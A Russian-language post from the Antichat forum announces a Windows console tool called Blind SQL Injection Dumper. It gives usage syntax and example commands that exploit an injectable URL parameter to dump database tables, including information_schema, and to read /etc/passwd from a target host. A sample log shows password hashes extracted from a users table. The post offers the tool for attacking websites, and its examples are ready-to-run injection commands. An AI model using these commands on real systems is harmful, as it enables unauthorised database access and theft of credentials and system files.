Форум АНТИЧАТ - Blind SQL Injection Dumper

Blind SQL Injection Dumper v1.1 (Win32 Console)

По мотивам https://forum.antichat.ru/showpost.php?p=1494443&postcount=11

[Описание]
1. Возникает сложность при использовании большой и сложной конструкции запроса, особенно при переборе с использованием LIMIT.
Утилита с ключом -q позволяет автоматизировать этот процесс.
На вход подаете SQL запрос к какой нибудь таблице, прога добавляет условно бесконечный LIMIT на выходе получаете дамп на консоли и в файле.
2. При чтении файла данным способом вывод ограничивается 64 символами.
Утилита с ключом -f позволяет автоматизировать этот процесс и дампить файл блоками по 64 символа.
На вход подаете полный путь до файла который нужно сдампить с целевого хоста, на выходе получаете дамп в файле.

[Синтаксис]

Цитата:

BlindSQLiDumper.exe [full path whith vuln param] -[q,f [param]] [file out(default result.txt)]
param:
-q ["sql query to unlimit repeat"]
-f [full path to filename for download]

Пример для дампа данных:

Цитата:

BlindSQLiDumper.exe test.com /forum/index.php?id=-123' -q "select table_name from information_schema.tables" tables.txt

Пример для дампа файла:

Код:

BlindSQLiDumper.exe test.com /forum/index.php?id=-123' -f /etc/passwd passwd

Особенности:
1. Имя хоста без http://
2. SQL запрос обязательно в кавычках.
3. По умолчанию создается файл result.txt в текущей дире.
4. Имя файла без кавычек, т.к. автоматически преобразует в hex эвивалент.
5. Естественно необходим file_priv = Y

[Лог работы]

Цитата:

========================
Blind SQL Injection Dumper
by [53x]Shadow for Antichat.ru
Based on Qwazar Fast Blind SQL Injection Method
Need MySQL version >= 5.0.*
========================

start...
sql query: select password from users
query result:
358fa3824cfe5ac363f5ec254eafff57
acd455efd4541bf9b2e05f895c957e83
Dump stopped!